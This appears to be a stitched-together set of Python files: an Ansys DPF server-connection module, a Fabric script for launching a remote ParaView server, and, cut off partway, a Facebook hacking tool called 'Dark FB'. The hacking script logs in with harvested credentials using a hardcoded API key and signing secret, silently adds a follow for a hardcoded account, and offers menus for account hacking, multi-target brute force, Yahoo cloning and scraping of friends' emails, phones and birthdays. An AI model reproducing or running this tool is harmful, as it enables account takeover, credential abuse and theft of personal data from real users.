"or attempt to use a different port"
)
dpf.core._server_instances.append(weakref.ref(server))
return server
def connect_to_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT, as_global=True, timeout=5):
"""Connect to an existing DPF server.
This method sets the global default channel that is then used for the
    duration of the DPF session.
Parameters
----------
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
timeout : float, optional
        Maximum number of seconds for the initialization attempt.
        The default is ``5``. Once the specified number of seconds
passes, the connection fails.
Examples
--------
>>> from ansys.dpf import core as dpf
Create a server.
>>> #server = dpf.start_local_server(ip = '127.0.0.1')
>>> #port = server.port
Connect to a remote server at a non-default port.
>>> #specified_server = dpf.connect_to_server('127.0.0.1', port, as_global=False)
Connect to the localhost at the default port.
>>> #unspecified_server = dpf.connect_to_server(as_global=False)
"""
server = DpfServer(ip=ip, port=port, as_global=as_global, launch_server=False)
dpf.core._server_instances.append(weakref.ref(server))
return server
class DpfServer:
"""Provides an instance of the DPF server.
Parameters
-----------
server_bin : str
Path for the DPF executable.
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
        Maximum number of seconds for the initialization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default
is ``True``.
launch_server : bool, optional
Whether to launch the server on Windows.
"""
def __init__(
self,
ansys_path="",
ip=LOCALHOST,
port=DPF_DEFAULT_PORT,
timeout=10,
as_global=True,
load_operators=True,
launch_server=True,
):
"""Start the DPF server."""
# check valid ip and port
check_valid_ip(ip)
if not isinstance(port, int):
raise ValueError("Port must be an integer")
if os.name == "posix" and "ubuntu" in platform.platform().lower():
raise OSError("DPF does not support Ubuntu")
elif launch_server:
launch_dpf(ansys_path, ip, port)
self.channel = grpc.insecure_channel("%s:%d" % (ip, port))
if launch_server is False:
state = grpc.channel_ready_future(self.channel)
# verify connection has matured
tstart = time.time()
while ((time.time() - tstart) < timeout) and not state._matured:
time.sleep(0.01)
if not state._matured:
raise TimeoutError(
f"Failed to connect to {ip}:{port} in {timeout} seconds"
)
LOG.debug("Established connection to DPF gRPC")
# assign to global channel when requested
if as_global:
dpf.core.SERVER = self
# TODO: add to PIDs ...
# store port and ip for later reference
self.live = True
self.ansys_path = ansys_path
self._input_ip = ip
self._input_port = port
self._own_process = launch_server
@property
def _base_service(self):
if not hasattr(self, "__base_service"):
from ansys.dpf.core.core import BaseService
self.__base_service = BaseService(self, timeout=1)
return self.__base_service
@property
def info(self):
"""Server information.
Returns
-------
info : dictionary
Dictionary with server information, including ``"server_ip"``,
``"server_port"``, ``"server_process_id"``, and
``"server_version"`` keys.
"""
return self._base_service.server_info
@property
def ip(self):
"""IP address of the server.
Returns
-------
ip : str
"""
try:
return self._base_service.server_info["server_ip"]
except:
return ""
@property
def port(self):
"""Port of the server.
Returns
-------
port : int
"""
try:
return self._base_service.server_info["server_port"]
except:
return 0
@property
def version(self):
"""Version of the server.
Returns
-------
version : str
"""
return self._base_service.server_info["server_version"]
def __str__(self):
return f"DPF Server: {self.info}"
def shutdown(self):
if self._own_process and self.live and self._base_service:
self._base_service._prepare_shutdown()
p = psutil.Process(self._base_service.server_info["server_process_id"])
p.kill()
time.sleep(0.1)
self.live = False
try:
if id(dpf.core.SERVER) == id(self):
dpf.core.SERVER = None
except:
pass
        try:
            # iterate over a copy because entries are removed while looping
            for server in list(dpf.core._server_instances):
                if server() == self:
                    dpf.core._server_instances.remove(server)
        except:
            pass
def __eq__(self, other_server):
"""Return true, if the ip and the port are equals"""
if isinstance(other_server, DpfServer):
return self.ip == other_server.ip and self.port == other_server.port
return False
def __ne__(self, other_server):
"""Return true, if the ip or the port are different"""
return not self.__eq__(other_server)
def __del__(self):
try:
self.shutdown()
except:
pass
def check_version(self, required_version, msg=None):
"""Check if the server version matches with a required version.
Parameters
----------
required_version : str
Required version to compare with the server version.
msg : str, optional
Message for the raised exception if version requirements do not match.
Raises
------
dpf_errors : errors
errors.DpfVersionNotSupported is raised if failure.
Returns
-------
bool
``True`` if the server version meets the requirement.
"""
from ansys.dpf.core.check_version import server_meet_version_and_raise
return server_meet_version_and_raise(required_version, self, msg)
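# Illustrative sketch (not part of the original module): check_version()
# raises a DPF version error when the connected server is older than
# required, so a guard around a version-dependent feature might look like
# this. The required version string below is a placeholder assumption.
def _example_server_meets(server, required="3.0"):
    """Sketch: return ``True`` only if ``server`` satisfies ``required``."""
    try:
        return server.check_version(
            required, msg=f"This feature needs a DPF server >= {required}"
        )
    except Exception:
        return False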
def launch_dpf(ansys_path, ip=LOCALHOST, port=DPF_DEFAULT_PORT, timeout=10):
"""Launch Ansys DPF.
Parameters
----------
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
        Maximum number of seconds for the initialization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
Returns
-------
process : subprocess.Popen
DPF Process.
"""
if os.name == "nt":
run_cmd = f"Ans.Dpf.Grpc.bat --address {ip} --port {port}"
path_in_install = "aisol/bin/winx64"
else:
run_cmd = ["./Ans.Dpf.Grpc.sh", f"--address {ip}", f"--port {port}"]
path_in_install = "aisol/bin/linx64"
# verify ansys path is valid
if os.path.isdir(f"{ansys_path}/{path_in_install}"):
dpf_run_dir = f"{ansys_path}/{path_in_install}"
else:
dpf_run_dir = f"{ansys_path}"
if not os.path.isdir(dpf_run_dir):
raise NotADirectoryError(
f'Invalid ansys path at "{ansys_path}". '
"Unable to locate the directory containing DPF at "
f'"{dpf_run_dir}"'
)
old_dir = os.getcwd()
os.chdir(dpf_run_dir)
process = subprocess.Popen(run_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
os.chdir(old_dir)
# check to see if the service started
lines = []
def read_stdout():
for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
LOG.debug(line)
lines.append(line)
    stderr_lines = []  # named so the ``errors`` exceptions module is not shadowed below
    def read_stderr():
        for line in io.TextIOWrapper(process.stderr, encoding="utf-8"):
            LOG.error(line)
            stderr_lines.append(line)
# must be in the background since the process reader is blocking
Thread(target=read_stdout, daemon=True).start()
Thread(target=read_stderr, daemon=True).start()
t_timeout = time.time() + timeout
started = False
while not started:
started = any("server started" in line for line in lines)
if time.time() > t_timeout:
raise TimeoutError(f"Server did not start in {timeout} seconds")
# verify there were no errors
time.sleep(1)
    if stderr_lines:
try:
process.kill()
except PermissionError:
pass
errstr = "\n".join(errors)
if "Only one usage of each socket address" in errstr:
raise errors.InvalidPortError(f"Port {port} in use")
        raise RuntimeError(errstr)
    return process
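# Illustrative sketch (not part of the original module): launch_dpf() drains
# the child's stdout in a background thread and waits for a "server started"
# line before returning. The same pattern, reduced to a generic helper (the
# name ``_example_wait_for_line`` is hypothetical):
def _example_wait_for_line(proc, needle, timeout=10.0):
    """Sketch: block until ``needle`` appears on ``proc.stdout`` or time out."""
    seen = []
    def _drain():
        for line in io.TextIOWrapper(proc.stdout, encoding="utf-8"):
            seen.append(line)
    Thread(target=_drain, daemon=True).start()
    deadline = time.time() + timeout
    while time.time() < deadline:
        if any(needle in line for line in seen):
            return True
        time.sleep(0.05)
    return False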
|
pvserver.py
|
from paraview.simple import *
from fabric.api import (env, run, cd, get, hide, settings,
remote_tunnel, show, shell_env)
from fabric.tasks import execute
from zutil import analysis
import logging
log = logging.getLogger("paramiko.transport")
sh = logging.StreamHandler()
sh.setLevel(logging.DEBUG)
log.addHandler(sh)
import sys
import multiprocessing as mp
from multiprocessing import Process, Value
process_id = None
use_multiprocess = True
# Uncomment for output logging
# logger = mp.get_logger()
# logger.addHandler(logging.StreamHandler(sys.stdout))
# logger.setLevel(mp.SUBDEBUG)
def pvserver(remote_dir, paraview_cmd, paraview_port, paraview_remote_port):
with show('debug'), remote_tunnel(int(paraview_remote_port), local_port=int(paraview_port)), cd(remote_dir):
# with cd(remote_dir):
if not use_multiprocess:
run('sleep 2;' + paraview_cmd + '</dev/null &>/dev/null&', pty=False)
else:
# # run('sleep 2;'+paraview_cmd+'&>/dev/null',pty=False)
run('sleep 2;' + paraview_cmd) # , pty=False)
# run(paraview_cmd+'</dev/null &>/dev/null',pty=False)
# run('screen -d -m "yes"')
# ssh asrc2 "(ls</dev/null &>/dev/null&) 2>&1; true" 2>/dev/null || echo
# SSH connection or remote command failed - either of them returned
# non-zero exit code $?
def pvcluster(remote_dir, paraview_home, paraview_args,
paraview_port, paraview_remote_port, job_dict):
with show('debug'), remote_tunnel(int(paraview_remote_port), local_port=int(paraview_port)):
with shell_env(PARAVIEW_HOME=paraview_home, PARAVIEW_ARGS=paraview_args):
run('echo $PARAVIEW_HOME')
run('echo $PARAVIEW_ARGS')
run('mkdir -p ' + remote_dir)
with cd(remote_dir):
cmd_line = 'mycluster --create pvserver.job --jobname=pvserver'
cmd_line += ' --jobqueue ' + job_dict['job_queue']
cmd_line += ' --ntasks ' + job_dict['job_ntasks']
cmd_line += ' --taskpernode ' + job_dict['job_ntaskpernode']
if 'vizstack' in paraview_args:
cmd_line += ' --script mycluster-viz-paraview.bsh'
else:
cmd_line += ' --script mycluster-paraview.bsh'
cmd_line += ' --project ' + job_dict['job_project']
run(cmd_line)
run('chmod u+rx pvserver.job')
run('mycluster --immediate --submit pvserver.job')
def port_test(rport, lport):
# Run a test
with hide('everything'), remote_tunnel(int(rport), local_port=int(lport)):
run('cd')
def run_uname(with_tunnel):
with hide('everything'):
run('uname -a')
def test_ssh(status, **kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
try:
env.use_ssh_config = True
execute(run_uname, False, hosts=[_remote_host])
except:
status.value = 0
return False
return True
def test_ssh_mp(**kwargs):
# print 'Starting test ssh'
status = Value('i', 1)
process_id = mp.Process(target=test_ssh, args=(status,), kwargs=kwargs)
process_id.start()
process_id.join()
if status.value == 0:
return False
return True
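# Illustrative sketch (not part of the original script): test_ssh_mp() isolates
# the fabric call in a child process (fabric and multiprocessing do not mix
# well in-process) and reads the outcome back through a shared Value. The same
# pattern in generic form; the helper name is hypothetical.
def _example_run_isolated(target, *args):
    """Sketch: run target(status, *args) in a child process, return success."""
    status = Value('i', 1)  # child sets this to 0 on failure
    child = mp.Process(target=target, args=(status,) + args)
    child.start()
    child.join()
    return status.value != 0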
def test_remote_tunnel(**kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
try:
env.use_ssh_config = True
execute(run_uname, True, hosts=[_remote_host])
except:
return False
return True
def get_remote_port(**kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
paraview_remote_port = analysis.data.paraview_remote_port
if 'paraview_remote_port' in kwargs:
paraview_remote_port = kwargs['paraview_remote_port']
else:
# Attempt to find an unused remote port
print 'Attempting to find unused port in range 12000 to 13000'
for p in range(12000, 13000):
tp = Value('i', p)
process_id = mp.Process(target=test_remote_port,
args=(port_test, tp,
paraview_port, _remote_host))
process_id.start()
process_id.join()
# print tp.value
if tp.value != 0:
break
print 'Selected Port: ' + str(p)
analysis.data.paraview_remote_port = p
def test_remote_port(port_test, port, paraview_port, remote_host):
try:
env.use_ssh_config = True
execute(port_test, port.value, paraview_port, hosts=[remote_host])
return True
except:
port.value = 0
return False
def pvserver_start(remote_host, remote_dir, paraview_cmd):
if paraview_cmd is not None:
env.use_ssh_config = True
execute(pvserver, remote_dir, paraview_cmd, hosts=[remote_host])
def pvserver_connect(**kwargs):
"""
    Be careful when adding to this function: fabric execute calls do not play
    well with multiprocessing. Do not mix direct fabric execute calls with
    mp-based fabric execute calls.
"""
#global remote_data, data_dir, data_host, remote_server_auto
#global paraview_cmd, process_id, paraview_port, paraview_remote_port
#global process_id
_paraview_cmd = analysis.data.paraview_cmd
if 'paraview_cmd' in kwargs:
_paraview_cmd = kwargs['paraview_cmd']
if '-sp' in _paraview_cmd or '--client-host' in _paraview_cmd:
        print('pvserver_process: Please only provide the pvserver '
              'executable path and name without arguments')
print 'e.g. mpiexec -n 1 /path_to_pvserver/bin/pvserver'
return False
# Add Check for passwordless ssh
print 'Testing passwordless ssh access'
if not test_ssh_mp(**kwargs):
print 'ERROR: Passwordless ssh access to data host failed'
return False
print '-> Passed'
# Add check for paraview version
# Find free remote port
get_remote_port(**kwargs)
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
if not use_multiprocess:
pvserver_process(**kwargs)
else:
print 'Starting pvserver connect'
process_id = mp.Process(target=pvserver_process, kwargs=kwargs)
process_id.start()
# process_id.join()
# time.sleep(6)
ReverseConnect(paraview_port)
return True
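# Illustrative usage sketch (not part of the original script):
# pvserver_connect() reads its settings either from zutil's analysis.data or
# from keyword arguments. The host, directory and command below are
# placeholder assumptions for illustration only.
def _example_connect():
    """Sketch: open a reverse-connected pvserver session on a remote host."""
    return pvserver_connect(
        data_host='user@remote-cluster',                   # hypothetical host
        data_dir='/scratch/user/case',                     # hypothetical remote dir
        paraview_cmd='mpiexec -n 4 /opt/paraview/bin/pvserver',
        paraview_port=11111,                               # local client port
    )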
def pvcluster_process(**kwargs):
pvserver_process(**kwargs)
def pvserver_process(**kwargs):
#global remote_data, data_dir, data_host, remote_server_auto
#global paraview_cmd, paraview_home, paraview_port, paraview_remote_port
print 'Starting pvserver process'
_remote_dir = analysis.data.data_dir
if 'data_dir' in kwargs:
_remote_dir = kwargs['data_dir']
_paraview_cmd = analysis.data.paraview_cmd
if 'paraview_cmd' in kwargs:
_paraview_cmd = kwargs['paraview_cmd']
_paraview_home = analysis.data.paraview_home
if 'paraview_home' in kwargs:
_paraview_home = kwargs['paraview_home']
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
"""
_job_ntasks = 1
if 'job_ntasks' in kwargs:
_job_ntasks = kwargs['job_ntasks']
"""
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
# This global variable may have already been set so check
paraview_remote_port = analysis.data.paraview_remote_port
if 'paraview_remote_port' in kwargs:
paraview_remote_port = kwargs['paraview_remote_port']
else:
# Attempt to find an unused remote port
print 'Attempting to find unused port in range 12000 to 13000'
for p in range(12000, 13000):
try:
env.use_ssh_config = True
execute(port_test, p, paraview_port, hosts=[_remote_host])
break
except:
pass
print 'Selected Port: ' + str(p)
analysis.data.paraview_remote_port = p
if 'job_queue' in kwargs:
# Submit job
remote_hostname = _remote_host[_remote_host.find('@') + 1:]
if 'vizstack' in kwargs:
paraview_args = ('/opt/vizstack/bin/viz-paraview -r ' +
str(kwargs['job_ntasks']) + ' -c ' +
remote_hostname + ' -p ' +
str(paraview_remote_port))
else:
paraview_args = (' -rc --client-host=' + remote_hostname +
' -sp=' + str(paraview_remote_port))
print paraview_args
job_dict = {
'job_queue': kwargs['job_queue'],
'job_ntasks': kwargs['job_ntasks'],
'job_ntaskpernode': kwargs['job_ntaskpernode'],
'job_project': kwargs['job_project'],
}
if _paraview_home is not None:
env.use_ssh_config = True
execute(pvcluster, _remote_dir, _paraview_home, paraview_args,
analysis.data.paraview_port, analysis.data.paraview_remote_port,
job_dict, hosts=[_remote_host])
else:
# Run Paraview
if '-sp' in _paraview_cmd or '--client-host' in _paraview_cmd:
            print ('pvserver_process: Please only provide the pvserver '
                   'executable path and name without arguments')
print 'e.g. mpiexec -n 1 /path_to_pvserver/bin/pvserver'
return False
if 'vizstack' in kwargs:
_paraview_cmd = (_paraview_cmd + ' -c localhost ' + ' -p ' +
str(analysis.data.paraview_remote_port))
else:
_paraview_cmd = (_paraview_cmd +
' -rc --client-host=localhost -sp=' +
str(analysis.data.paraview_remote_port))
if _paraview_cmd is not None:
env.use_ssh_config = True
execute(pvserver, _remote_dir, _paraview_cmd, analysis.data.paraview_port,
analysis.data.paraview_remote_port, hosts=[_remote_host])
def pvserver_disconnect():
Disconnect()
if process_id:
process_id.terminate()
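# Illustrative sketch (not part of the original script): an end-to-end flow
# under the same placeholder assumptions as _example_connect() above --
# connect, open a dataset with ParaView's simple API (star-imported at the top
# of this file), then drop the client connection.
def _example_session(case_file='/scratch/user/case/output.pvd'):
    """Sketch: minimal connect -> open -> disconnect round trip."""
    if not pvserver_connect(data_host='user@remote-cluster',
                            paraview_cmd='mpiexec -n 4 /opt/paraview/bin/pvserver'):
        return None
    reader = OpenDataFile(case_file)  # hypothetical remote dataset path
    pvserver_disconnect()
    return reader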
|
darkfb_wrd_234.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Surya Febri Alwari \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/zeargames/Darkfb-Zeargames\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m: \x1b[1;92\x1b[92mTutotial_Sulit\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n[*] Login Using Operamini To Not Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://bit.ly/2XGQVlv')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
